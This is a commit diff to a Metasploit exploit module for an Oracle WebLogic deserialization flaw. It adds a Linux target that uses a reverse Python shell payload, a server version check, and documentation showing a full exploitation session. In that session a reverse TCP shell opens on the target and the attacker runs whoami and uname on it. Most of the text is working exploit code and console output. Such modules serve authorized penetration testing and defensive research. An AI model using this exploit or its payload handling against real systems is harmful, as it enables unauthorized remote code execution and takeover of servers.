Land #10540, weblogic_deserialize, add check method and linux target

2018-08-30 06:08:03 -05:00 · 2018-08-30 06:08:03 -05:00 · 9d3e1c1942
parent bb8f3bb5d4 3161beff69
commit 9d3e1c1942
2 changed files with 91 additions and 9 deletions
--- a/documentation/modules/exploit/windows/misc/weblogic_deserialize.md
+++ b/documentation/modules/exploit/windows/misc/weblogic_deserialize.md
@ -45,3 +45,39 @@ Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 
 ```
+
+### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29
+```
+msf5 > use exploit/windows/misc/weblogic_deserialize
+msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205
+rhosts => 172.22.222.205
+msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197
+lhost => 172.22.222.197
+msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197 
+srvhost => 172.22.222.197
+msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true
+verbose => true
+msf5 exploit(windows/misc/weblogic_deserialize) > check
+
+[+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0
+[*] 172.22.222.205:7001 The target appears to be vulnerable.
+msf5 exploit(windows/misc/weblogic_deserialize) > run
+[*] Exploit running as background job 2.
+msf5 exploit(windows/misc/weblogic_deserialize) > 
+[*] Started reverse TCP handler on 172.22.222.197:4444 
+[*] 172.22.222.205:7001 - Sending handshake...
+[*] 172.22.222.205:7001 - Sending client object payload...
+[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
+[*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205
+[*] 172.22.222.205:7001 - Comparing host: 172.22.222.205
+[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500
+[*] 172.22.222.205:7001 - Server stopped.
+msf5 exploit(windows/misc/weblogic_deserialize) > 
+sessions -i 1
+[*] Starting interaction with 1...
+
+whoami
+msfdev
+uname -a
+Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+```
--- a/modules/exploits/windows/misc/weblogic_deserialize.rb
+++ b/modules/exploits/windows/misc/weblogic_deserialize.rb
@ -34,10 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote
      'Privileged' => false,
      'Targets' =>
        [
-          [ 'Windows',
-            {
-              'Platform' => ['win']
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
+            'Payload' => {
+              'Encoder' => 'cmd/ifs',
+              'BadChars' => ' ',
+              'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
            }
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Payload' => {},
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
          ]
        ],
      'DefaultTarget' => 0,
@ -48,10 +58,47 @@ class MetasploitModule < Msf::Exploit::Remote
      'DisclosureDate' => 'Apr 17 2018'))
  end

+  def check
+    connect
+    req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+    req << "Host: #{peer}\n\n"
+    sock.put(req)
+
+    res = sock.get_once
+    disconnect
+    return CheckCode::Unknown unless res
+
+    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
+    if version
+      version = Gem::Version.new(version)
+      vprint_good("Detected Oracle WebLogic Server Version: #{version.to_s}")
+
+      case
+      when version.to_s.start_with?('10.3')
+        return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+      when version.to_s.start_with?('12.1')
+        return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+      when version.to_s.start_with?('12.2')
+        return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
+      end
+    end
+
+    if res.include?('Oracle WebLogic Server Administration Console')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
  def gen_resp
-    pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
-    pwrshl.gsub!("%COMSPEC%", "cmd.exe")
-    tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+    if target.name == 'Windows'
+      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+      tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+    else
+      nix_cmd = payload.encoded
+      nix_cmd.prepend('/bin/sh -c ')
+      tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
+    end

    mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')
    mycmd << tmp_dat
@ -140,7 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
    @resp << '7e005a'
  end

-
  def on_client_connect(client)
    # Make sure to only sent one meterpreter payload to a host.
    # During testing the remote host called back up to 11 times
@ -149,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
    if @met_sent.include?(client.peerhost) then return end
    @met_sent << client.peerhost

-    vprint_status("met_sent: #{@met_sent}")
+    vprint_status("Sending payload to client: #{client.peerhost}")

    # Response format determined by watching network traffic
    # generated by EDB PoC
@ -304,7 +350,7 @@ class MetasploitModule < Msf::Exploit::Remote

    start_service

-    vprint_status('Sending payload...')
+    print_status('Sending client object payload...')
    send_payload_objdata

    # Need to wait this long to make sure we get a shell back